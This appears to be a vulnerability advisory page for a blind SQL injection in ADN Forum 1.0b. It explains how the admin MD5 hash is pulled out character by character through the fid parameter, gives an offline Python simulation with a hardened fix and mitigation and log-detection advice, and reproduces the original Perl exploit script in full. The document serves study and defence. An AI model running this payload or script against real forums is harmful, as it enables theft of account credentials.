Vendor: ADN Forum
Author: StAkeR
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: ADN Forum
Affected Version From: 1.0b
Affected Version To: 1.0b
Patch Exists: YES
Related CWE: N/A
CPE: a:adn_forum:adn_forum:1.0b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

ADN Forum <= 1.0b Blind SQL Injection Exploit

This exploit retrieves the MD5 password hash of the user with id 1 from an ADN Forum 1.0b installation through a boolean-based blind SQL injection in the fid parameter of index.php. It is written in Perl and sends its requests with LWP::UserAgent. For each position of the 32-character hash it injects a condition of the form `' or ascii(substring((select password from adn_usuarios where id=1),<position>,1))=<code>#` and tries the 16 hexadecimal characters (0-9, a-f) in turn. The page never returns the data itself; the script instead checks whether the response body contains the Spanish string "hace clic en el boton de abajo" ("click the button below"), which the page renders only when the injected condition is true. When it does, the script appends that character to the hash and moves on to the next position. Recovering the full hash therefore costs at most 512 requests (32 positions, 16 candidates each).
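The extraction loop described above, reproduced offline as an added example (this is not code from the page or from the ADN Forum project). The `adn_usuarios` table and its `id`/`password` columns come from the exploit's payload; the `adn_foros` table, its `nombre` column, the shape of the query behind `index.php?fid=`, and the `hardened_page` fix are assumptions made for the demo. Because the oracle runs against SQLite rather than MySQL, the payload uses `unicode()`, `substr()` and `--` in place of `ascii()`, `substring()` and `#`.

```python
"""Boolean-based blind SQL injection oracle, simulated offline against SQLite."""
import hashlib
import sqlite3

# Same 16-character alphabet the exploit tries at every position (0-9, a-f).
HEX_CODES = [ord(c) for c in "0123456789abcdef"]
TRUE_MARKER = "hace clic en el boton de abajo"   # string the Perl exploit greps for
DEMO_HASH = hashlib.md5(b"secret").hexdigest()   # constructed sample credential


def make_db(password_hash):
    """Constructed schema: adn_usuarios comes from the exploit's payload; adn_foros
    is an assumed table behind index.php?fid= (the real one is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE adn_usuarios (id INTEGER PRIMARY KEY, usuario TEXT, password TEXT);
        CREATE TABLE adn_foros (id INTEGER PRIMARY KEY, nombre TEXT);
        INSERT INTO adn_foros VALUES (1, 'General');
    """)
    conn.execute("INSERT INTO adn_usuarios VALUES (1, 'admin', ?)", (password_hash,))
    return conn


def vulnerable_page(conn, fid):
    """Unsafe string concatenation: the assumed shape of the 1.0b bug."""
    sql = "SELECT nombre FROM adn_foros WHERE id = '" + fid + "'"
    row = conn.execute(sql).fetchone()
    # A successful forum lookup renders the prompt; a failed one does not.
    return TRUE_MARKER if row else "foro no encontrado"


def hardened_page(conn, fid):
    """Fix: enforce the identifier's type and bind it instead of splicing it in."""
    try:
        fid_int = int(fid)
    except ValueError:
        return "foro no encontrado"
    row = conn.execute("SELECT nombre FROM adn_foros WHERE id = ?", (fid_int,)).fetchone()
    return TRUE_MARKER if row else "foro no encontrado"


def extract_hash(page, length=32):
    """Recover the hash one character at a time through the true/false oracle.

    Returns (recovered_string, number_of_requests). MySQL's ascii()/substring()/#
    are written as SQLite's unicode()/substr()/-- so the demo runs offline.
    """
    found, requests = "", 0
    for pos in range(1, length + 1):
        for code in HEX_CODES:
            payload = ("' or unicode(substr((select password from adn_usuarios "
                       "where id=1),%d,1))=%d--" % (pos, code))
            requests += 1
            if TRUE_MARKER in page(payload):
                found += chr(code)
                break
        else:
            break   # no candidate matched: end of data, or the oracle is gone
    return found, requests


if __name__ == "__main__":
    db = make_db(DEMO_HASH)
    print("vulnerable:", extract_hash(lambda fid: vulnerable_page(db, fid)))
    print("hardened:  ", extract_hash(lambda fid: hardened_page(db, fid)))
```

Against `vulnerable_page` the loop returns the full hash after at most 512 oracle queries; against `hardened_page` the first position never matches, the loop stops after 16 queries and nothing leaks, which is the behaviour to expect after the fix.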

Mitigation:

Upgrade to a release that fixes the issue (the page records that a patch exists but does not name the fixed version). If upgrading is not immediately possible, fix the root cause in the application: fid is a numeric identifier, so cast it to an integer (or reject anything that is not digits) before it reaches the query, and move the query to a prepared statement with a bound parameter rather than string concatenation. Because the injection is blind, each request leaks only one true/false bit, so an attack shows up in the web server logs as a long run of requests to index.php whose fid value contains a quote followed by "or", "ascii(substring(" or the table name adn_usuarios.

Exploit-DB raw data:

#!/usr/bin/perl
# --------------------------------------------------
# ADN Forum <= 1.0b Blind SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 01/10/2008
# Download: http://sourceforge.net/projects/adnforum/
# --------------------------------------------------
# Usage: perl exploit.pl http://localhost
# --------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

# $pos is the 1-based character position inside the 32-char MD5 hash;
# $hash accumulates the characters recovered so far.
my ($request,$send,$ord,$hash,$pos) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
# MD5 hex digests only contain 0-9 and a-f, so 16 candidates per position
my @chars = (48..57, 97..102);
my $http = LWP::UserAgent->new;

# each pass recovers one character, so 33 passes cover the 32-char hash
for(0..32)
{
  foreach $ord(@chars)
  {
    # boolean condition: true only when the character at $pos has code $ord;
    # the trailing '#' comments out the rest of the original query (MySQL)
    $send = "' or ascii(substring((select password from adn_usuarios where id=1),$pos,1))=$ord#";
    $send = uri_escape($send);

    $request = $http->get($host."/index.php?fid=".$send);

    # a true condition makes the page render this prompt ("click the button below")
    if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
    {
      $hash .= chr($ord);
      $pos++;
      last;   # character found, no need to test the remaining candidates
    }
  }
}

if(defined $hash)
{
  print "[+] MD5: $hash\n";
  exit;
}
else
{
  print "[?] Exploit Failed!\n";
  exit;
}

# milw0rm.com [2008-10-01]